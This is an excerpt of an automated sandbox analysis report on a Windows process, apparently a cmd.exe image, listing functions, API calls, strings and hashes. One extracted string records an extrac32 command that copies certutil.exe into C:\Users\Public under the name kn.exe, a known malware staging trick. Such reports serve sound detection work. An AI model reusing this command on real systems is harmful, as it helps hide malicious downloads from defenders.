                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$ErrorFileFindFirstLast
                                                      • String ID:
                                                      • API String ID: 2831795651-0
                                                      • Opcode ID: 34f645f5c86efc0bd8e314808c067c4c3c4a7cbfbdbdaf0d964846df1b52e835
                                                      • Instruction ID: df07049457d9ff05dbdcdc45b4132e565cf554b8878d2728d8f4a798ba011402
                                                      • Opcode Fuzzy Hash: 34f645f5c86efc0bd8e314808c067c4c3c4a7cbfbdbdaf0d964846df1b52e835
                                                      • Instruction Fuzzy Hash: E0D1F272A0868286E764EF25E4413FAB3A1FB447A4F905536DE4E07798CFBCE540C791
                                                      Function 00007FF7E1DB7D30 Relevance: 3.3, APIs: 2, Instructions: 252COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • memset.MSVCRT ref: 00007FF7E1DB7DA1
                                                        • Part of subcall function 00007FF7E1DC417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7E1DC41AD
                                                        • Part of subcall function 00007FF7E1DBD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7E1DBD46E
                                                        • Part of subcall function 00007FF7E1DBD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7E1DBD485
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD4EE
                                                        • Part of subcall function 00007FF7E1DBD3F0: iswspace.MSVCRT ref: 00007FF7E1DBD54D
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD569
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD58C
                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7E1DB7EB7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                                      • String ID:
                                                      • API String ID: 168394030-0
                                                      • Opcode ID: fcb4b5f905d0aebc32b32cc76eff33a3c0356d0c89562b4ffa07b37f6e37bbfa
                                                      • Instruction ID: c448347729e5a6a54f5b16b3153142bfbf6cd3e87b29c1472dab64065c2a013c
                                                      • Opcode Fuzzy Hash: fcb4b5f905d0aebc32b32cc76eff33a3c0356d0c89562b4ffa07b37f6e37bbfa
                                                      • Instruction Fuzzy Hash: 79A12421F0865395FB24EB2598427BAA3A1FF85784F804136DD0E47AE4DFBCE441C362
                                                      Function 00007FF7E1DC89E4 Relevance: 3.0, APIs: 2, Instructions: 43nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: InformationQueryToken
                                                      • String ID:
                                                      • API String ID: 4239771691-0
                                                      • Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                      • Instruction ID: 116135bfbdb0f23e76d4d3d4256b05823d7508cc48088b5cad67137537daebd7
                                                      • Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                      • Instruction Fuzzy Hash: FB11A573A08781CBEB10DF01E4007AAFBA4FB85795F808532DB4842794DBBDD598CB51
                                                      Function 00007FF7E1DC8114 Relevance: 3.0, APIs: 2, Instructions: 41filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: FileInformation$HandleQueryVolume
                                                      • String ID:
                                                      • API String ID: 2149833895-0
                                                      • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                      • Instruction ID: 79a233cdad7c402fca4ae30de9dbcfd45bbda6482f4788d1f1eab0e7cbc73cd6
                                                      • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                      • Instruction Fuzzy Hash: 121173326087C286E760DB50F4417AEF7A0FB84B84F859636DA9D42A54DFFCD488CB51
                                                      Function 00007FF7E1DB8510 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DBD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7E1DBD46E
                                                        • Part of subcall function 00007FF7E1DBD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7E1DBD485
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD4EE
                                                        • Part of subcall function 00007FF7E1DBD3F0: iswspace.MSVCRT ref: 00007FF7E1DBD54D
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD569
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD58C
                                                      • towupper.MSVCRT ref: 00007FF7E1DB85D4
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                                                      • String ID:
                                                      • API String ID: 3520273530-0
                                                      • Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                      • Instruction ID: a257dc2d6ed43407e1be52d76a0eeba85ac8cd414be202c1e3ed42f673392a23
                                                      • Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                      • Instruction Fuzzy Hash: 7C61DE22A0C20296E764FE24D146779E7A0FB04794F908537EA1E562D5DEBCE8A0C763
                                                      Function 00007FF7E1DC898C Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: InformationQueryToken
                                                      • String ID:
                                                      • API String ID: 4239771691-0
                                                      • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                      • Instruction ID: b28cfebd276e7c7b9074f88430a0b3e5926370dc03486f56ddd28404b6902b88
                                                      • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                      • Instruction Fuzzy Hash: B5F01CB3B04B81CBD7009F64E58589CB778F744B84795857ACB2903704DBB5D9A4CB50
                                                      Function 00007FF7E1DC93B0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7E1DC93BB
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                      • Instruction ID: 73286feddc1c5b26e7f7702864a2838b64e5cd3ea43a728e64b3b1f5d6c1a025
                                                      • Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                      • Instruction Fuzzy Hash: 54B09210E25402E1D708FB229C8217452A0AB58711FC01832D00E80260DEACA19BCB11
                                                      Function 00007FF7E1DBF8C0 Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 380COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF7E1DBF52A,00000000,00000000,?,00000000,?,00007FF7E1DBE626,?,?,00000000,00007FF7E1DC1F69), ref: 00007FF7E1DBF8DE
                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBF8FB
                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBF951
                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBF96B
                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBFA8E
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DBFB14
                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBFB2D
                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBFBEA
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DBF996
                                                        • Part of subcall function 00007FF7E1DC0010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF7E1DD849D,?,?,?,00007FF7E1DDF0C7), ref: 00007FF7E1DC0045
                                                        • Part of subcall function 00007FF7E1DC0010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7E1DDF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DC0071
                                                        • Part of subcall function 00007FF7E1DC0010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DC0092
                                                        • Part of subcall function 00007FF7E1DC0010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7E1DC00A7
                                                        • Part of subcall function 00007FF7E1DC0010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7E1DC0181
                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DCD401
                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DCD41B
                                                      • longjmp.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DCD435
                                                      • longjmp.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DCD480
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                      • String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                      • API String ID: 3964947564-518410914
                                                      • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                      • Instruction ID: 06ceacd9a7ff7348dd1fb9a944db3f578028f188226194ca4d9f31961f2d5e16
                                                      • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                      • Instruction Fuzzy Hash: 9D02A021E09A0296EB18FB21D8427B9F7A1FF49B55FD08537D90E422D4DFBCA550C3A2
                                                      Function 00007FF7E1DC02A0 Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 279COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmp$iswspacewcschr
                                                      • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                      • API String ID: 840959033-3627297882
                                                      • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                      • Instruction ID: c421526ab7fca0619a36b3f039d2c93d4f4f4737810d5a35944bd677fb0c8efc
                                                      • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                      • Instruction Fuzzy Hash: 3CD13A21E0864396EB14FB21A8473B9A7A0BF44B45FC48837D94E86295DFBCE445C7B2
                                                      Function 00007FF7E1DC081C Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmp$EnvironmentVariable
                                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                      • API String ID: 198002717-267741548
                                                      • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                      • Instruction ID: ca2de5f1459bd04552f6199a2311cc94333b015ccb357c4895388737f1f1b74d
                                                      • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                      • Instruction Fuzzy Hash: 6C510E25E0864795FB14EB11A8123BAEB60FF49B81FC4D576C90E83654DFBCE144C7A2
                                                      Function 00007FF7E1DBEF40 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 465COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7E1DBE626,?,?,00000000,00007FF7E1DC1F69), ref: 00007FF7E1DBF000
                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBF031
                                                      • iswdigit.MSVCRT(?,?,00000000,00007FF7E1DC1F69,?,?,?,?,?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000), ref: 00007FF7E1DBF0D6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: iswdigitiswspacewcschr
                                                      • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                      • API String ID: 1595556998-2755026540
                                                      • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                      • Instruction ID: eb490af2ee3f44e31be0ea0f6010ee679c6cf7f280bf4d46f5c9871756d8ddef
                                                      • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                      • Instruction Fuzzy Hash: 0A228AA5D08653A1FB64FB15A8427B9E6A0FF05791FC08133D98E822E4DFBCA4518773
                                                      Function 00007FF7E1DBD3F0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 310memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                      • String ID: "$=,;
                                                      • API String ID: 3545743878-4143597401
                                                      • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                      • Instruction ID: e423b7428915700ba977cf01605c71c9e1f85fd49b913115fd2b588b4524b2b5
                                                      • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                      • Instruction Fuzzy Hash: 3BC1A665E09A9692EB25EB1190027F9F6E1FF45F49FC58036CA4F02394EFBCE445C622
                                                      Function 00007FF7E1DD5BF4 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 153windowthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CurrentFormatMessageThread
                                                      • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                      • API String ID: 2411632146-3173542853
                                                      • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                      • Instruction ID: 76b759c309c8d26b09f79372d455d95665908449226ef56c0886792f83e96bad
                                                      • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                      • Instruction Fuzzy Hash: 5A617DB5A0964281EB24FF55A4467B5A3A0FF44B88FC48237DA4D43758CFBCE541C762
                                                      Function 00007FF7E1DC26E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 187fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
